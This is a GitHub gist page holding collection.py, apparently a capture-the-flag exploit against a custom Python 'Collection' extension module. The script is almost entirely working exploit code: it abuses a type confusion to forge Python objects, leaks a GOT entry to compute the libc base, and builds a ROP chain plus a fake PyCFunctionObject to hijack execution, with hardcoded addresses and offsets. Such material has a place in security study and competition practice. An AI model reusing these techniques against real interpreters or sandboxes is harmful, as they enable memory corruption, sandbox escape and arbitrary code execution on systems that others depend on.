Skip to content

Instantly share code, notes, and snippets.

@andreafioraldi

andreafioraldi/collection.py

Created December 31, 2018 17:14
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save andreafioraldi/ff5aa797e5272980d12c61ba01f08399 to your computer and use it in GitHub Desktop.
Save andreafioraldi/ff5aa797e5272980d12c61ba01f08399 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
collection.py
chr = {0: '\x00', 1: '\x01', 2: '\x02', 3: '\x03', 4: '\x04', 5: '\x05', 6: '\x06', 7: '\x07', 8: '\x08', 9: '\t', 10: '\n', 11: '\x0b', 12: '\x0c', 13: '\r', 14: '\x0e', 15: '\x0f', 16: '\x10', 17: '\x11', 18: '\x12', 19: '\x13', 20: '\x14', 21: '\x15', 22: '\x16', 23: '\x17', 24: '\x18', 25: '\x19', 26: '\x1a', 27: '\x1b', 28: '\x1c', 29: '\x1d', 30: '\x1e', 31: '\x1f', 32: ' ', 33: '!', 34: '"', 35: '#', 36: '$', 37: '%', 38: '&', 39: "'", 40: '(', 41: ')', 42: '*', 43: '+', 44: ',', 45: '-', 46: '.', 47: '/', 48: '0', 49: '1', 50: '2', 51: '3', 52: '4', 53: '5', 54: '6', 55: '7', 56: '8', 57: '9', 58: ':', 59: ';', 60: '<', 61: '=', 62: '>', 63: '?', 64: '@', 65: 'A', 66: 'B', 67: 'C', 68: 'D', 69: 'E', 70: 'F', 71: 'G', 72: 'H', 73: 'I', 74: 'J', 75: 'K', 76: 'L', 77: 'M', 78: 'N', 79: 'O', 80: 'P', 81: 'Q', 82: 'R', 83: 'S', 84: 'T', 85: 'U', 86: 'V', 87: 'W', 88: 'X', 89: 'Y', 90: 'Z', 91: '[', 92: '\\', 93: ']', 94: '^', 95: '_', 96: '`', 97: 'a', 98: 'b', 99: 'c', 100: 'd', 101: 'e', 102: 'f', 103: 'g', 104: 'h', 105: 'i', 106: 'j', 107: 'k', 108: 'l', 109: 'm', 110: 'n', 111: 'o', 112: 'p', 113: 'q', 114: 'r', 115: 's', 116: 't', 117: 'u', 118: 'v', 119: 'w', 120: 'x', 121: 'y', 122: 'z', 123: '{', 124: '|', 125: '}', 126: '~', 127: '\x7f', 128: '\x80', 129: '\x81', 130: '\x82', 131: '\x83', 132: '\x84', 133: '\x85', 134: '\x86', 135: '\x87', 136: '\x88', 137: '\x89', 138: '\x8a', 139: '\x8b', 140: '\x8c', 141: '\x8d', 142: '\x8e', 143: '\x8f', 144: '\x90', 145: '\x91', 146: '\x92', 147: '\x93', 148: '\x94', 149: '\x95', 150: '\x96', 151: '\x97', 152: '\x98', 153: '\x99', 154: '\x9a', 155: '\x9b', 156: '\x9c', 157: '\x9d', 158: '\x9e', 159: '\x9f', 160: '\xa0', 161: '\xa1', 162: '\xa2', 163: '\xa3', 164: '\xa4', 165: '\xa5', 166: '\xa6', 167: '\xa7', 168: '\xa8', 169: '\xa9', 170: '\xaa', 171: '\xab', 172: '\xac', 173: '\xad', 174: '\xae', 175: '\xaf', 176: '\xb0', 177: '\xb1', 178: '\xb2', 179: '\xb3', 180: '\xb4', 181: '\xb5', 182: '\xb6', 183: '\xb7', 184: '\xb8', 185: '\xb9', 186: '\xba', 187: '\xbb', 188: '\xbc', 189: '\xbd', 190: '\xbe', 191: '\xbf', 192: '\xc0', 193: '\xc1', 194: '\xc2', 195: '\xc3', 196: '\xc4', 197: '\xc5', 198: '\xc6', 199: '\xc7', 200: '\xc8', 201: '\xc9', 202: '\xca', 203: '\xcb', 204: '\xcc', 205: '\xcd', 206: '\xce', 207: '\xcf', 208: '\xd0', 209: '\xd1', 210: '\xd2', 211: '\xd3', 212: '\xd4', 213: '\xd5', 214: '\xd6', 215: '\xd7', 216: '\xd8', 217: '\xd9', 218: '\xda', 219: '\xdb', 220: '\xdc', 221: '\xdd', 222: '\xde', 223: '\xdf', 224: '\xe0', 225: '\xe1', 226: '\xe2', 227: '\xe3', 228: '\xe4', 229: '\xe5', 230: '\xe6', 231: '\xe7', 232: '\xe8', 233: '\xe9', 234: '\xea', 235: '\xeb', 236: '\xec', 237: '\xed', 238: '\xee', 239: '\xef', 240: '\xf0', 241: '\xf1', 242: '\xf2', 243: '\xf3', 244: '\xf4', 245: '\xf5', 246: '\xf6', 247: '\xf7', 248: '\xf8', 249: '\xf9', 250: '\xfa', 251: '\xfb', 252: '\xfc', 253: '\xfd', 254: '\xfe', 255: '\xff'}
def p64(n):
s = ""
s += chr[(n) & 0xFF]
s += chr[(n >> 8) & 0xFF]
s += chr[(n >> 16) & 0xFF]
s += chr[(n >> 24) & 0xFF]
s += chr[(n >> 32) & 0xFF]
s += chr[(n >> 40) & 0xFF]
s += chr[(n >> 48) & 0xFF]
s += chr[(n >> 56) & 0xFF]
return s
def u64(b):
n = 0
n += b[0]
n += (b[1] << 8)
n += (b[2] << 16)
n += (b[3] << 24)
n += (b[4] << 32)
n += (b[5] << 40)
n += (b[6] << 48)
n += (b[7] << 56)
return n
def addressof(obj):
return id(obj) +72
def fakeobj(addr):
a = Collection.Collection({'1': 0, '2': []})
b = Collection.Collection({'2': [], '1': addr})
return b.get('2')
fake_bytearray = ""
fake_bytearray += p64(3)
fake_bytearray += p64(0x09CE7E0) #bytearray type desc
fake_bytearray += p64(0x14)
fake_bytearray += p64(0x15)
fake_bytearray += p64(0x9B37B0) #got entry
fake_bytearray += p64(0x9B37B0)
fake_bytearray += p64(0)
got_entry = fakeobj(addressof(fake_bytearray))
leak = u64(got_entry.ljust(8, b'\x00')[:8])
print("got entry:", hex(leak))
libc = leak - 1615920
print("libc:", hex(libc))
iovec_buf = "a"*100
iovec_buf_len = 100
iovec = ""
iovec += p64(addressof(iovec_buf))
iovec += p64(iovec_buf_len)
chain = ""
chain += p64(libc + 0x000000000002155f)
chain += p64(1023)
chain += p64(libc + 0x0000000000023e6a)
chain += p64(addressof(iovec))
chain += p64(libc + 0x0000000000001b96)
chain += p64(1)
chain += p64(libc + 0x116600)
chain += p64(libc + 0x000000000002155f)
chain += p64(1)
chain += p64(libc + 0x0000000000023e6a)
chain += p64(addressof(iovec_buf))
chain += p64(libc + 0x0000000000001b96)
chain += p64(iovec_buf_len)
chain += p64(libc + 0x00110140)
chain += p64(libc + 0x000000000002155f)
chain += p64(0)
chain += p64(libc + 0x43120)
ctx = p64(addressof(chain))
ctx += p64(0x52368a) # ret
print("target:", hex(libc+0x520a5))
PyMethodDef = ''
PyMethodDef += p64(0x0713005) #readv string
PyMethodDef += p64(libc+0x520a5) #put here addr
PyMethodDef += p64(0x0008) #flags METH_0
PyMethodDef += p64(0x0713005) #readv string
PyCFunctionObject = ""
PyCFunctionObject += p64(3)
PyCFunctionObject += p64(0x9d0460) #cfunc type
PyCFunctionObject += p64(addressof(PyMethodDef))
PyCFunctionObject += p64(addressof(ctx) - 0xA0) #self (first arg)
PyCFunctionObject += p64(0)*2
#print("chain:", hex(addressof(chain)))
#print(hex(id(PyCFunctionObject)))
x = fakeobj(addressof(PyCFunctionObject))
print(hex(id(x)))
x(0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment